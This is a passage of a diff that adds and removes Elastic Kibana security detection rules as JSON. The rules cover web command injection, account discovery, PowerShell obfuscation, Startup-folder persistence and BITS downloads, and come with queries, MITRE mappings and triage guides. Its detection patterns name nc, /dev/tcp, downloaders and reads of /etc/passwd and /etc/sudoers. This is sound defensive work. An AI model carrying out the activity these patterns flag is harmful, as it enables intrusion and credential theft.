or Esql.contains_shell == 1 or Esql.contains_nc == 1 or Esql.contains_devtcp == 1 or\n Esql.contains_helpers == 1 or Esql.contains_sus_cli == 1 or Esql.contains_privileges == 1 or Esql.contains_downloader == 1 or\n Esql.contains_file_read_keywords == 1 or Esql.contains_base64_cmd == 1 or Esql.contains_suspicious_path == 1, 1, 0)\n\n| keep\n @timestamp,\n Esql.url_original_to_lower,\n Esql.any_payload_keyword,\n Esql.contains_interpreter,\n Esql.contains_shell,\n Esql.contains_nc,\n Esql.contains_devtcp,\n Esql.contains_helpers,\n Esql.contains_sus_cli,\n Esql.contains_privileges,\n Esql.contains_downloader,\n Esql.contains_file_read_keywords,\n Esql.contains_base64_cmd,\n Esql.contains_suspicious_path,\n source.ip,\n destination.ip,\n agent.id,\n http.request.method,\n http.response.status_code,\n user_agent.original,\n agent.name,\n event.dataset,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.url_path_count_distinct = count_distinct(Esql.url_original_to_lower),\n\n // General fields\n\n Esql.agent_name_values = values(agent.name),\n Esql.agent_id_values = values(agent.id),\n Esql.url_path_values = values(Esql.url_original_to_lower),\n Esql.http.response.status_code_values = values(http.response.status_code),\n Esql.user_agent_original_values = values(user_agent.original),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace),\n\n // Rule Specific fields\n Esql.any_payload_keyword_max = max(Esql.any_payload_keyword),\n Esql.contains_interpreter_values = values(Esql.contains_interpreter),\n Esql.contains_shell_values = values(Esql.contains_shell),\n Esql.contains_nc_values = values(Esql.contains_nc),\n Esql.contains_devtcp_values = values(Esql.contains_devtcp),\n Esql.contains_helpers_values = values(Esql.contains_helpers),\n Esql.contains_sus_cli_values = values(Esql.contains_sus_cli),\n Esql.contains_privileges_values = values(Esql.contains_privileges),\n Esql.contains_downloader_values = values(Esql.contains_downloader),\n Esql.contains_file_read_keywords_values = values(Esql.contains_file_read_keywords),\n Esql.contains_base64_cmd_values = values(Esql.contains_base64_cmd),\n Esql.contains_suspicious_path_values = values(Esql.contains_suspicious_path)\n\n by source.ip, agent.id\n\n| where\n // Filter for potential command injection attempts with low event counts to reduce false positives\n Esql.any_payload_keyword_max == 1 and Esql.event_count < 5\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^3.0.0" + }, + { + "package": "apache", + "version": "^3.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.0.0" + }, + { + "package": "iis", + "version": "^1.0.0" + }, + { + "package": "traefik", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.agent_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.any_payload_keyword_max", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_base64_cmd_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_devtcp_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_downloader_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_file_read_keywords_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_helpers_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_interpreter_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_nc_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_privileges_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_shell_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_sus_cli_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_suspicious_path_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http.response.status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.user_agent_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "f3ac6734-7e52-4a0d-90b7-6847bf4308f2", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 3 + }, + "id": "f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4.json deleted file mode 100644 index e7f7ba03082..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4.json +++ /dev/null @@ -1,118 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Adversaries may use built-in applications to get a listing of local system or domain accounts and groups.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "Account or Group Discovery via Built-In Tools", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and ( \n (process.name in (\"groups\", \"id\")) or \n (process.name == \"dscl\" and process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\")) or\n (process.name == \"dscacheutil\" and process.args in (\"user\", \"group\")) or\n (process.args in (\"/etc/passwd\", \"/etc/master.passwd\", \"/etc/sudoers\")) or\n (process.name == \"getent\" and process.args in (\"passwd\", \"group\"))\n)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "auditd_manager", - "version": "^1.18.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1069", - "name": "Permission Groups Discovery", - "reference": "https://attack.mitre.org/techniques/T1069/", - "subtechnique": [ - { - "id": "T1069.001", - "name": "Local Groups", - "reference": "https://attack.mitre.org/techniques/T1069/001/" - }, - { - "id": "T1069.002", - "name": "Domain Groups", - "reference": "https://attack.mitre.org/techniques/T1069/002/" - } - ] - }, - { - "id": "T1087", - "name": "Account Discovery", - "reference": "https://attack.mitre.org/techniques/T1087/", - "subtechnique": [ - { - "id": "T1087.001", - "name": "Local Account", - "reference": "https://attack.mitre.org/techniques/T1087/001/" - }, - { - "id": "T1087.002", - "name": "Domain Account", - "reference": "https://attack.mitre.org/techniques/T1087/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 - }, - "id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_7.json b/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_7.json deleted file mode 100644 index c65d85434fb..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_7.json +++ /dev/null @@ -1,178 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use string concatenation as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via String Concatenation", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via String Concatenation\n\nPowerShell is a powerful scripting language used for task automation and configuration management. Adversaries exploit its flexibility to obfuscate malicious scripts, often using string concatenation to evade detection. The detection rule identifies scripts with excessive concatenation patterns, flagging potential obfuscation by analyzing script length and pattern frequency, thus aiding in uncovering hidden threats.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and purpose of the script, focusing on the sections identified by the string concatenation patterns.\n- Examine the file.path field to determine the location of the script on the host system, which can provide context about its origin and potential legitimacy.\n- Check the host.name and agent.id fields to identify the affected system and correlate with other security events or alerts from the same host for broader context.\n- Investigate the user.id field to determine which user executed the script, assessing their role and whether they have a legitimate reason to run such scripts.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution flow and sequence of the script blocks, which may reveal additional obfuscation or malicious behavior.\n- Cross-reference the _id and _index fields with other logs or alerts to identify any related incidents or patterns of activity that might indicate a larger threat campaign.\n\n### False positive analysis\n\n- Scripts with legitimate string concatenation for logging or configuration purposes may trigger the rule. Review the script context to determine if the concatenation is part of a benign operation.\n- Automated scripts generated by development tools might use string concatenation extensively. Identify these tools and consider excluding their output directories or specific script patterns from the rule.\n- PowerShell scripts used in complex data processing tasks may naturally contain high levels of string concatenation. Analyze the script's purpose and, if deemed safe, add exceptions for specific script block IDs or paths.\n- Frequent administrative scripts that concatenate strings for dynamic command execution could be flagged. Verify the script's source and function, then whitelist known safe scripts by user ID or host name.\n- Consider adjusting the threshold for pattern detection if legitimate scripts frequently exceed the current limit, ensuring that the rule remains effective without generating excessive false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts across the network. Disconnect it from the network and any shared resources.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of potentially obfuscated scripts.\n- Conduct a thorough examination of the script block text and associated files to identify and remove any malicious code or artifacts. Use a secure, isolated environment for analysis.\n- Restore the affected system from a known good backup if malicious activity is confirmed and cannot be easily remediated.\n- Update and run a full antivirus and antimalware scan on the affected system to ensure no additional threats are present.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are compromised.\n- Implement enhanced monitoring and logging for PowerShell activities across the network to detect similar obfuscation attempts in the future, ensuring that alerts are configured to notify the appropriate personnel promptly.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"['\"][A-Za-z0-9.]+['\"](\\s?\\+\\s?['\"][A-Za-z0-9.,\\-\\s]+['\"]){2,}\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least twice\n| where Esql.script_block_pattern_count >= 2\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "f6d8c743-0916-4483-8333-3c6f107e0caa", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 7 - }, - "id": "f6d8c743-0916-4483-8333-3c6f107e0caa_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_316.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_316.json new file mode 100644 index 00000000000..32f55c6c95f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_316.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistent Scripts in the Startup Directory", + "note": "## Triage and analysis\n\n### Performance\n\nThis rule may have low to medium performance impact due to the generic nature of VBS and JS scripts being loaded by Windows script engines.\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n\n /* Call attention to file extensions that may be used for malicious purposes */\n /* Optionally, Windows scripting engine processes targeting shortcut files */\n (\n file.extension : (\"vbs\", \"vbe\", \"wsh\", \"wsf\", \"js\", \"jse\", \"sct\", \"hta\", \"ps1\", \"bat\", \"cmd\") or\n process.name : (\"wscript.exe\", \"cscript.exe\")\n ) and not (startsWith(user.domain, \"NT\") or endsWith(user.domain, \"NT\"))\n\n /* Identify files created or changed in the startup folder */\n and file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + }, + { + "id": "T1547.009", + "name": "Shortcut Modification", + "reference": "https://attack.mitre.org/techniques/T1547/009/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 316 + }, + "id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0_316", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_12.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_12.json new file mode 100644 index 00000000000..6de4b723810 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_12.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Ingress Transfer via Windows BITS", + "note": "## Triage and analysis\n\n### Investigating Ingress Transfer via Windows BITS\n\nWindows Background Intelligent Transfer Service (BITS) is a technology that allows the transfer of files between a client and a server, which makes it a dual-use mechanism, being used by both legitimate apps and attackers. When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process, which can bypass security protections, and it helps to obscure which application requested the transfer.\n\nThis rule identifies such abuse by monitoring for file renaming events involving \"svchost.exe\" and \"BIT*.tmp\" on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Gain context into the BITS transfer.\n - Try to determine the process that initiated the BITS transfer.\n - Search `bitsadmin.exe` processes and examine their command lines.\n - Look for unusual processes loading `Bitsproxy.dll` and other BITS-related DLLs.\n - Try to determine the origin of the file.\n - Inspect network connections initiated by `svchost.exe`.\n - Inspect `Microsoft-Windows-Bits-Client/Operational` Windows logs, specifically the event ID 59, for unusual events.\n - Velociraptor can be used to extract these entries using the [bitsadmin artifact](https://docs.velociraptor.app/exchange/artifacts/pages/bitsadmin/).\n - Check the reputation of the remote server involved in the BITS transfer, such as its IP address or domain, using threat intelligence platforms or online reputation services.\n - Check if the domain is newly registered or unexpected.\n - Use the identified domain as an indicator of compromise (IoCs) to scope other compromised hosts in the environment.\n - [BitsParser](https://github.com/fireeye/BitsParser) can be used to parse BITS database files to extract BITS job information.\n- Examine the details of the dropped file, and whether it was executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved executables using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- Known false positives for the rule include legitimate software and system updates that use BITS for downloading files.\n\n### Related Rules\n\n- Persistence via BITS Job Notify Cmdline - c3b915e0-22f3-4bf7-991d-b643513c722f\n- Unsigned BITS Service Client Process - 9a3884d0-282d-45ea-86ce-b9c81100f026\n- Bitsadmin Activity - 8eec4df1-4b4b-4502-b6c3-c788714604c9\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or 